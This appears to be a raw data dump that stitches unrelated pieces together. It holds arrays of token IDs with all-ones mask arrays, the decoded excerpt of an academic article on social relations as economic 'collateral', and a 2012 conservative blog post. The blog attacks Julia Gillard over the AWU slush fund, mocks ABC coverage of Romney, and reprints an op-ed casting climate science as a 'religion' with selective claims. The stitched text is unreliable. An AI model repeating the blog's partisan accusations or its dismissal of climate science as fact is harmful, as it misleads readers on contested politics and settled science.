[ 1, 1317, 727, 5019, 1683, 411, 714, 727, 411, 13568, 294, 583, 896, 864, 304, 679, 714, 29973, 13, 13, 6833, 306, 278, 871, 697, 393, 10753, 901, 769, 278, 15311, 7916, 2834, 322, 12220, 1960, 1554, 23505, 29973, 1152, 408, 1472, 408, 306, 508, 6456, 278, 2969, 310, 1641, 1361, 2723, 600, 287, 322, 16842, 900, 7176, 297, 4565, 310, 2305, 306, 1016, 29915, 29873, 1073, 313, 2541, 278, 3682, 310, 697, 393, 306, 9311, 29897, 408, 896, 505, 727, 982, 411, 592, 297, 577, 1784, 5837, 322, 21833, 29898, 1028, 804, 292, 29892, 377, 4512, 29892, 470, 284, 7916, 29892, 1584, 2748, 3546, 10198, 918, 29897, 756, 6077, 592, 373, 304, 278, 1298, 306, 29915, 29885, 373, 3974, 29889, 1317, 727, 5019, 1683, 411, 714, 727, 13568, 8995, 29915, 29879, 393, 10753, 304, 679, 714, 29973, 313, 25125, 29876, 29915, 29873, 817, 304, 367, 763, 7903, 29897, 13, 13, 6833, 306, 278, 871, 697, 393, 10753, 901, 769, 278, 15311, 7916, 2834, 322, 12220, 1960, 1554, 23505, 29973, 1152, 408, 1472, 408, 306, 508, 6456, 278, 2969, 310, 1641, 1361, 2723, 600, 287, 322, 16842, 900, 7176, 297, 4565, 310, 2305, 306, 1016, 29915, 29873, 1073, 313, 2541, 278, 3682, 310, 697, 393, 306, 9311, 29897, 408, 13, 856, 13, 13, 6833, 306, 278, 871, 697, 393, 10753, 901, 769, 278, 15311, 7916, 2834, 322, 12220, 1960, 1554, 23505, 29973, 1152, 408, 1472, 408, 306, 508, 6456, 278, 2969, 310, 1641, 1361, 2723, 600, 287, 322, 16842, 900, 7176, 297, 4565, 310, 2305, 306, 1016, 29915, 29873, 1073, 313, 2541, 278, 3682, 310, 697, 393, 306, 9311, 29897, 408, 896, 505, 727, 982, 411, 592, 297, 577, 1784, 5837, 322, 21833, 29898, 1028, 804, 292, 29892, 377, 4512, 29892, 470, 284, 7916, 29892, 1584, 2748, 3546, 10198, 918, 29897, 756, 6077, 592, 373, 304, 278, 1298, 306, 29915, 29885, 373, 3974, 29889, 1317, 727, 5019, 1683, 411, 714, 727, 13568, 8995, 29915, 29879, 393, 10753, 304, 679, 714, 29973, 313, 25125, 29876, 29915, 29873, 817, 304, 367, 763, 7903, 29897, 13, 13, 3782, 29892, 366, 29915, 276, 11630, 451, 29889, 5806, 306, 29915, 29885, 451, 8852, 297, 278, 2318, 7916, 856, 29902, 11630, 626, 8852, 297, 413, 682, 29891, 7916, 393, 29915, 29879, 1422, 515, 4226, 29889, 11511, 29892, 590, 7826, 18326, 338, 263, 901, 376, 29576, 3245, 29908, 7916, 2924, 310, 2022, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Collateralized Social Relations: The Social in Economic Calculation Article excerpt RICHARD P. CASTANIAS [*] ABSTRACT. Traditionally, economists have viewed social relations as "friction" or "impediments" to exchange and have excluded social relations from their analyses by assuming autonomous actors. Recently, however, a number of scholars--economists, sociologists, anthropologists, and other social scientists--have begun to discuss the numerous ways in which social arrangements both prompt and channel economic activity. Rational choice theory, social capital and network analysis, and agency and game theory, are among those approaches that consider the effects of social relations on economic action. In this paper we extend that discussion by arguing that social relations can function as "collateral" or assurance that an economic transaction will proceed as agreed by the parties involved. We review recent microeconomic theories and conjecture how they might be developed following this observation, which is derived from sociological and anthropological studies of economic action and organization. I Introduction SOCIAL SCIENTISTS OF VARIOUS PERSUASIONS, however much they may have disagreed about some matters, historically have shared the assumption that advanced capitalism required the movement away from the entanglements of traditional social relations to the impersonal, individuated relations we associate with modern economies in the West. Classical economist Adam Smith ([1776] 1976, pp. 232-233), for example, argued for the abolition of regulations requiring members of a trade to register publicly, fearing they would learn each others' identities and collude. He reasoned that atomized, asocial economic actors better serve competitive markets. Following the same logic, Max Weber (1951), in attempting to account for the failure of industrial capitalism to develop in China, placed the blame on the constraints of a demanding communal structure, what he referred to as "the fetters of the sib." "The legal forms and societal foundations for capitalist 'enterprise' were absent in the Chinese economy. There was no rational depersonalization of business comparable to its unmistakable beginnings in the commercial law of the Italian cities" (1951, p. 85), an important foundation for Western capitalist development. The idea that the most efficient economy is one in which unencumbered actors rationally calculate and act upon their own interests remains in force in much social science thinking today. Actors hamstrung by family ties, by attachments to traditionally important locales, or by pressure to favor relations cannot make optimal economic decisions. Non-rational social and emotional relations interfere with rational economic calculus and the movement of people and assets to their most economically efficient function. While not taking on directly the question of the "costs" of social relations to economic efficiency, studies of the economy by institutional social scientists increasingly recognize that economic activity takes place within and in reference to a social context, what Mark Granovetter, reviving the work of Karl Polanyi, calls the "embeddedness" of economic activity (1985). This paper attempts to theorize and extend what a number of studies suggest: while social relations can act as impediments, as classical theories assume, social relations also can be a medium for and catalyst to economic activity. Additionally, we believe that actors knowledgeably and actively utilize social understandings in formulating economic strategies. In making this assertion, we are going beyond the ideas that social relations are simply the context or playing field on which economic action takes place, or that social structural factors shape preferences. Rather, we will argue that knowledgeable actors actively use their social relations to advance their economic interests and that in some instances social relations can form the basis for market activity where atomized actors cannot. …
[ 1, 13435, 1008, 284, 1891, 10307, 6376, 800, 29901, 450, 10307, 297, 12884, 293, 20535, 362, 13, 13, 9986, 2512, 429, 2265, 415, 13, 13, 29934, 2965, 29950, 17011, 349, 29889, 12766, 1254, 2190, 29902, 3289, 518, 29930, 29962, 13, 13, 2882, 1254, 4717, 1783, 29889, 18375, 17658, 29892, 7766, 2879, 505, 24774, 5264, 5302, 408, 376, 1341, 2463, 29908, 470, 376, 6574, 287, 7862, 29908, 304, 14523, 322, 505, 429, 13347, 5264, 5302, 515, 1009, 3483, 952, 267, 491, 10241, 28273, 681, 29701, 29889, 3599, 2705, 29892, 3138, 29892, 263, 1353, 310, 1364, 324, 1503, 489, 29872, 4599, 2879, 29892, 5374, 1189, 2879, 29892, 24612, 1336, 1189, 2879, 29892, 322, 916, 5264, 9638, 2879, 489, 17532, 23580, 304, 5353, 278, 12727, 5837, 297, 607, 5264, 15196, 4110, 1716, 9508, 322, 8242, 17407, 6354, 29889, 390, 1288, 7348, 6368, 29892, 5264, 7483, 322, 3564, 7418, 29892, 322, 946, 3819, 322, 3748, 6368, 29892, 526, 4249, 1906, 13501, 393, 2050, 278, 9545, 310, 5264, 5302, 373, 17407, 3158, 29889, 512, 445, 5650, 591, 10985, 393, 10679, 491, 1852, 26420, 393, 5264, 5302, 508, 740, 408, 376, 22017, 1008, 284, 29908, 470, 1223, 18541, 393, 385, 17407, 10804, 674, 8469, 408, 15502, 491, 278, 13973, 9701, 29889, 1334, 9076, 7786, 9200, 29872, 4599, 293, 25841, 322, 25466, 545, 920, 896, 1795, 367, 8906, 1494, 445, 15500, 29892, 607, 338, 10723, 515, 5374, 5996, 322, 24612, 1336, 5996, 11898, 310, 17407, 3158, 322, 13013, 29889, 13, 13, 29902, 13, 13, 25898, 13, 13, 6156, 8426, 1964, 317, 8426, 3919, 24306, 8079, 478, 1718, 5971, 3308, 349, 1001, 14605, 3289, 27946, 29892, 3138, 1568, 896, 1122, 505, 22941, 276, 287, 1048, 777, 13750, 29892, 3603, 1711, 505, 7258, 278, 11833, 393, 12862, 7483, 1608, 3734, 278, 10298, 3448, 515, 278, 875, 574, 944, 29879, 310, 13807, 5264, 5302, 304, 278, 2411, 1330, 284, 29892, 4348, 29884, 630, 5302, 591, 25836, 411, 5400, 7766, 583, 297, 278, 3122, 29889, 4134, 936, 7766, 391, 11783, 7075, 9310, 29896, 29955, 29955, 29953, 29962, 29871, 29896, 29929, 29955, 29953, 29892, 6499, 29889, 29871, 29906, 29941, 29906, 29899, 29906, 29941, 29941, 511, 363, 1342, 29892, 28705, 363, 278, 25198, 654, 310, 1072, 8250, 26795, 5144, 310, 263, 11302, 304, 6036, 970, 368, 29892, 8866, 292, 896, 723, 5110, 1269, 4045, 29915, 2893, 1907, 322, 5321, 1151, 29889, 940, 2769, 287, 393, 12301, 1891, 29892, 408, 29877, 1455, 17407, 29701, 2253, 9080, 5100, 3321, 2791, 1691, 29889, 12206, 278, 1021, 5900, 29892, 5918, 1334, 495, 313, 29896, 29929, 29945, 29896, 511, 297, 15661, 304, 3633, 363, 278, 10672, 310, 18408, 7483, 1608, 304, 2693, 297, 7551, 29892, 7180, 278, 1999, 420, 373, 278, 11938, 310, 263, 9667, 292, 3817, 284, 3829, 29892, 825, 540, 12992, 304, 408, 376, 1552, 27431, 2153, 310, 278, 27767, 1213, 376, 1576, 11706, 7190, 322, 5374, 26310, 1476, 800, 363, 7483, 391, 525, 5893, 7734, 29915, 892, 29207, 297, 278, 10013, 26504, 29889, 1670, 471, 694, 17903, 1401, 1330, 284, 2133, 310, 5381, 5734, 519, 304, 967, 443, 29885, 391, 557, 519, 1812, 2559, 886, 297, 278, 12128, 4307, 310, 278, 10545, 14368, 29908, 313, 29896, 29929, 29945, 29896, 29892, 282, 29889, 29871, 29947, 29945, 511, 385, 4100, 22778, 363, 10504, 7483, 391, 5849, 29889, 13, 13, 1576, 2969, 393, 278, 1556, 8543, 26504, 338, 697, 297, 607, 443, 3977, 2807, 287, 29701, 364, 362, 635, 8147, 322, 1044, 2501, 1009, 1914, 20017, 9242, 297, 4889, 297, 1568, 5264, 10466, 7291, 9826, 29889, 3185, 943, 16366, 710, 686, 491, 3942, 260, 583, 29892, 491, 10641, 1860, 304, 11399, 635, 4100, 1887, 267, 29892, 470, 491, 12959, 304, 7853, 5302, 2609, 1207, 14413, 17407, 1602, 12112, 29889, 10050, 29899, 29878, 1288, 5264, 322, 23023, 1848, 5302, 1006, 29888, 406, 411, 17903, 17407, 24282, 322, 278, 10298, 310, 2305, 322, 21608, 304, 1009, 1556, 7766, 1711, 8543, 740, 29889, 13, 13, 8809, 488, 451, 5622, 373, 4153, 278, 1139, 310, 278, 376, 18253, 29879, 29908, 310, 5264, 5302, 304, 17407, 19201, 29892, 11898, 310, 278, 26504, 491, 12666, 284, 5264, 9638, 2879, 10231, 368, 18720, 393, 17407, 6354, 4893, 2058, 2629, 322, 297, 3407, 304, 263, 5264, 3030, 29892, 825, 4485, 6274, 586, 19036, 29892, 6664, 4357, 278, 664, 310, 8425, 2043, 1384, 29875, 29892, 5717, 278, 376, 17987, 7176, 2264, 29908, 310, 17407, 6354, 313, 29896, 29929, 29947, 29945, 467, 910, 5650, 14734, 304, 278, 272, 675, 322, 10985, 825, 263, 1353, 310, 11898, 4368, 29901, 1550, 5264, 5302, 508, 1044, 408, 25275, 7862, 29892, 408, 14499, 25841, 5251, 29892, 5264, 5302, 884, 508, 367, 263, 18350, 363, 322, 17246, 858, 304, 17407, 6354, 29889, 19814, 29892, 591, 4658, 393, 29701, 7134, 2197, 322, 1044, 3598, 3667, 675, 5264, 2274, 886, 297, 883, 18099, 17407, 16650, 583, 29889, 13, 13, 797, 3907, 445, 28306, 29892, 591, 526, 2675, 8724, 278, 7014, 393, 5264, 5302, 526, 3763, 278, 3030, 470, 8743, 1746, 373, 607, 17407, 3158, 4893, 2058, 29892, 470, 393, 5264, 2281, 3631, 13879, 8267, 5821, 2063, 29889, 390, 1624, 29892, 591, 674, 27754, 393, 7134, 519, 29701, 1044, 3598, 671, 1009, 5264, 5302, 304, 6564, 1009, 17407, 20017, 322, 393, 297, 777, 8871, 5264, 5302, 508, 883, 278, 8405, 363, 9999, 6354, 988, 12301, 1891, 29701, 2609, 29889, 16088 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Monday, November 05, 2012 Mon 5th Nov Todays News Happy birthday and many happy returns David Wyatt Warren. Born the same day I finished my video "Mystery of Webster's Curse part 1". Remember, birthdays are good for you. The more you have, the longer you live. === Piers Akerman – Monday,November 05,2012 (4:30am) Julia Gillard has three weeks to consider her future before both houses of Parliament sit for the final time this year. There are very distinct rumblings about her performance. Last week she dodged questions about her role as a lawyer at Slater & Gordon and the setting up of an dodgy association for then boyfriend AWU boss Bruce Wilson. The questions will not go away. Yesterday, Senator Eric Abetz told my colleague Andrew Bolt that the Australian people are entitled to know the truth. “She needs to make a full and frank statement as to what she knew and what her involvement was,” Abetz said on Bolt’s television program. Her statements at the moment suggest, on one interpretation, that she has misled the Parliament, in as much as she said that when she was being interviewed by Slater and Gordon in September 1995 all the matters were known to the AWU officials.” There you have it - the serious accusation that Gillard misled Parliament. Gillard has maintained that “by the time the matters she refers to came to my attention they were already the subject of inquiry and investigation”. But the record seems clear that there was no police investigation until at least a year after her partners at the Labor law firm had already made clear their grave concerns. Further, there is no evidence that Gillard or her partners attempted to assist police by providing files which might have assisted them. According to Abetz, there is a full 12 months in the chronology between Julia Gillard being interviewed and then leaving Slater and Gordon and the Australian Workers Union - which was being defrauded by Wilson- becoming aware of it and reporting it to the Police. “So the assertion that the Prime Minister made in the Parliament does not seem to gel with the chronology on the public record. Having said that, I’m willing to give the Prime Minister the benefit of the doubt, but only if she provides a full and frank explanation to the Australian people,” Abetz offered. While the Reform Association slush fund, as Gillard has called it did use the AWU name, the heads of the union were not told of its existence. Even accounting for Gillard’s excuse that she was young and naive at the time of her association with Wilson, money belonging to union members went missing and she has still to address those members who lost money and explain precisely what she knew and when she knew it. Hiding behind the passage of time is not a reality. With every day that passes, more pertinent documents emerge and with every new piece of paper another question mark appears. AWU members, like those of the HSU and the CMFEU who have also seen funds diverted from their asserted purpose deserve answers, as do all Australians. - lots and lots from a writer of the Lefitst Boston Globe who thinks Romney is “slippery”. - a Massachusetts Democrat who thinks Romney is slippery. - A Mormon who thinks Romney is trying to fulfill his father’s dream of being President. - an excerpt from an attack ad from Newt Gingrich claiming he caused “suffering” to “tens of thousands of Americans” as a venture capitalist. - an extract from the secretly recorded Mother Jones clip showing Romney saying 47 per cent of Americans are on benefits - or are “wastrels”, as ABC reporter Michael Brissenden helpfully interprets - and thus not likely to vote for him. Brissenden cites what he claims are examples of a long list of Romney policy flip flops, with climate change featuring, of course. He says the real Romney is hard to find. The most positive things Brissenden can think of is that Romney has built a Mormon church (but doesn’t want to discuss his inconvenient faith) and as Massachusetts governor worked with Democrats (but has now changed). As a feature on the man now tied with Saint Barack of Obama in the national vote, it was an excellent hatchet job. Should Romney pull off a win, ABC voters will be astonished - or convinced Americans must be mad, or even bad. His comments tore at the fabric of one of the most sensitive issues for Palestinians — the right of at least 5 million refugees and internally displaced people to return to their ancestral homes in what is now Israel. “I am a refugee, but I am living in Ramallah. I believe that the West Bank and Gaza is Palestine. And the other parts is Israel,” Mr Abbas said in the interview on Israel’s Channel 2 on Friday. “I want to see Safed. It is my right to see it, but not to live there. “All what we want is to establish an independent Palestinian state on the territories occupied by Israel in 1967 with East Jerusalem as its capital.” Responding to the widespread condemnation of his comments, Mr Abbas was forced to deny he conceded the right of return for Palestinians, saying he was expressing a personal opinion that did not represent a change in policy. There is no sense in which this is legitimate activity for public servants to undertake. And were a government minister to ask for such analysis, the appropriate action of the public servants would be respectfully to decline the request. I have attached a letter I received late last week from my children’s school indicating that their teachers will not be writing any comments (apart from general behavioural ones) in the end of year reports this year. This means that students will have a very scant record of the year’s work particularly when it comes to specialist areas like LOTE and art. I have a son in prep so his end of year report for this year is pretty important. I think asking students to forgo feedback for the year so that teachers can get a few more dollars shows a breathtaking lack of professionalism on the part of the teachers and an entitlement mentality that is just extraordinarily arrogant. If I had tried this sort of tactic in the private sector - refusing to complete reports for clients because I wanted more money - I would certainly have been sacked (and rightfully so). These teachers sure have taught their students a lesson - as in how to use even children as hostages for cash. Retired United States Air Force colonel Martha McSally is the Republican running for Gabrielle Giffords’ seat in Congress. Don’t ask her about the latest smear from parties of the Left - of the “war on women”. JULIA Gillard is suddenly in deep trouble over the slush fund she helped create for her then boyfriend, union boss Bruce Wilson. The Prime Minister seems to have misled Parliament last Thursday, prompting the Opposition yesterday to claim “the jury is out” about her involvement in her boyfriend’s scam. Gillard was asked in Parliament why she did not go to police - as the law requires - after learning her boyfriend used the slush fund to rip off $400,000, spending $100,000 to buy a house with a power of attorney witnessed by Gillard. Gillard: “By the time the matters she refers to came to my attention they were already the subject of inquiry and investigation.” But is that true? Gillard was grilled by angry fellow partners of her law firm in September 1995 about the fund. In August, she admitted she knew in 1995 something was improper. “I formed a view that I had not been dealt with honestly and, based on that view, I ended a relationship I had back then, 17 years ago,” she said. But it wasn’t until late 1996 that any police investigation started. Hedley Thomas agrees there is a real problem with the excuse Julia Gillard gave Parliament last week for not alerting police to her former boyfriend’s frauds: If Gillard means by this answer that the timing of the matters that came to her attention was August-September 1995, which is when her firm was tipped off and started an internal probe, she is mistaken on her second point. The record shows that there was no inquiry and no investigation into the slush fund at that time because the fund’s existence had not been disclosed to the AWU leadership, or to Victoria Police.... THE Coalition has demanded Julia Gillard offer a full parliamentary explanation over her involvement in a union slush fund she helped create in 1992 for her then boyfriend, union boss Bruce Wilson, to clarify whether she may have misled parliament. The opposition is also pressing the Prime Minister for the statement to address new questions on her knowledge of the slush fund, after declaring on August 23 that she had no further involvement after providing advice on its establishment as a partner at law firm Slater & Gordon. “I am seeking through the parliament a full and frank explanation from the Prime Minister on the very serious issue of her involvement in a union slush fund which allegedly defrauded the Australian Workers Union of hundreds of thousands of dollars,” Julie Bishop told The Australian yesterday. “I am challenging her recent version of events, by referring to documents that have not been previously put to her by a journalist about her involvement in this large slush fund and her knowledge of its operation.” Gillard’s failure to go to police may have helped her ex-boyfriend get away with more cash: Opposition workplace relations spokesman Eric Abetz said yesterday there was a full year between when Ms Gillard was interviewed by Slater & Gordon and when the AWU demanded its fraud probe of September 1996. In the intervening period, the two union officials sold the Fitzroy property bought with slush fund money and kept the proceeds of about $80,000. When Mother Nature decided in 1980 to change gears from cooler to warmer, a new global warming religion was born, replete with its own church (the UN), a papacy, (the Intergovernmental Panel on Climate Change), and a global warming priesthood masquerading as climate scientists. Selfish humans in rich, polluting countries were blamed for the warming and had to pay for past trespasses by providing material compensation to poor nations as penance. Cutting greenhouse gas emissions became the new holy grail. With a warm wind at their backs, these fundamentalists collected hundreds of billions of dollars from naive governments that adopted their faith on behalf of billions of people. No crusader was ever so effective. The message was stark. If the non-believers didn’t convert immediately, our children and grandchildren would face a hell on earth. The priesthood excommunicated and humiliated sceptics and deniers. Alternative views were not tolerated and, where possible, were suppressed. Did someone mention the dark ages? Newman does not exaggerate the suppression of debate - a scandal in this ostensibly free country. I am currently in furious argument with an agency active in prosecuting sceptics and stifling debate on this issue. I am bound by confidentiality requirements not to say more at the moment on this disgraceful attempt to protect the warming scare by peddling false claims, disputing clear evidence and recycling casual smears - but, by God, I one day will. Kafka lives. But I should warn Newman this particular agency takes official umbrage at arguments and evidence that he, too, advances. I can only hope that it will make the mistake of going after a former ABC chairman as well. Nothing would more clearly demonstrate its betrayal of its true mission and of the principle of free speech, Nothing would more surely expose it to public ridicule: Regrettably for the global warming religion, its predictions have started to appear shaky, and the converts, many of whom have lost their jobs and much of their wealth, are losing faith. Worse, heretic scientists have been giving the lie to many of the prophecies described in the IPCC bible. They could not be silenced ....the British arm of the climate establishment silently released an encyclical that revealed no discernible rise in aggregate global temperatures from the beginning of 1997 until August this year. This communique was unearthed by the heretic newspaper, the Daily Mail, which pointed out that this period was of about the same duration as when temperatures rose between 1980 to 1996. Of course, the religious high priests were quick to play down the significance of this pause. Phil Jones of the Climategate denomination claimed it was to be expected and, he insisted, 15 or 16 years is not a significant period. Yet in 2009 he said that a “no upward trend has to continue for a total of 15 years before we get worried”. But that was then and this is now and he is not about to lose his religion simply because the evidence doesn’t support the text. And, of course, there are always extenuating circumstances. El Nino and La Nina are there when you need them, to be forgotten when temperatures are warming or remembered if they are cooling. And, we’ve had a record Arctic melt. But better not mention the storm that NASA concedes broke the ice up and drove it south, or the record Antarctic ice gain. Rather we must listen to Australia’s Climate Change Commission novitiates who, against the evidence, have delivered a parable linking Superstorm Sandy to global warming. At least the media disciples are keeping the faith by emphasising what supports the gospel and, where possible, omitting that which doesn’t. New, corroborative revelations enjoy widespread publicity. If the same findings are later retracted for lack of scientific rigour, they are simply allowed to disappear without comment. The firm says that the downturn has also dampened company tax by more than Treasury allowed for in its mid-year budget update, released last month. “Absent further policy changes, we see 2012-13’s hoped-for surplus turning into a cash underlying deficit of $4.2bn. That is $5.3bn worse than Treasury forecasts,” it says. The firm expects results will be worse in 2013-14, as some of the one-off boosts to this year’s budget expire, raising the budget deficit to $5.1bn, compared with the forecast $2.2bn surplus. The obvious points here are: - how could the Government be so incompetent as to design a tax that raises only a fraction of the money it expected? - how could the Government be so reckless as to rack up deficits even in a mining boom and with a growing economy? - how could Labor be so spendthrift - now spending $100 billion a year more - as to fail to deliver a single surplus since its election in 2007? And there is its honesty issue: - how could the Government break yet another election promise - to return the Budget to surplus this year, ”no ifs, no buts”? But there is one other point to make about this broken promise. Gillard herself strikes me as someone who reflexively resorts to a fib under pressure, to put it mildly. Her instinctive reaction under pressure to say what’s convenient, not true - and hope to brazen things out if or when the truth finally comes out. In this she is helped by what a former Slater & Gordon partner once noted: I think she has a very robust sense of her own integrity and she prefers that view to those who would assail it. Those who doesn’t even blush when confronted with a deceit can make accusers doubt their own judgement. Some examples of Gillard resorting to what’s convenient, rather than true, meant or deliverable: - “there will be no carbon tax under a government I lead” - the undeliverable promise to independent MP Andrew Wilkie for mandatory precommitment technology on all pokie machines in exchange for his vote. - Gillard’s claim in 2009 that there was ”no evidence” of dozens of boat people being lured to their deaths. - Gillard’s claim in 2007 that her involvement with the Socialist Forum occurred “many a long year ago”, mostly when “I was a university student” doing “part-time clerical and administrative work” for this “debating society”, when in fact the Socialist Forum was a radical group helping to bring former members of the Communist Party into the Labor Party, and Gillard had been on its management committee, organising events and giving speeches, and remaining a member until 2002. - Gillard’s repeated retort to questions on the AWU scandal that she’s answered the questions in her August 2012 press conference - a patently untrue statement. - Gillard dodging criticism over her defence of Peter Slipper by falsely smearing Tony Abbott as a “misogynist”. Translate Subscribe To Followers Translator About Me I'm author of History in a Year by the Conservative Voice aka History of the World in a Year by the Conservative Voice. I'm the Conservative Voice. I'm looking to make contact with those who might use my skill. I have an m-audio mobile pre amp fed by the audiotechnica 2041sp condensor mic pack. Prior to 15/4/06, I'd used a Shure sm-58 that required a nuclear blast to register a sound or the internal mic of my aged imac, which has a penchance to recording my breathing. I also used a Griffin itrip, until the community convinced me it was not hiding my talent as well 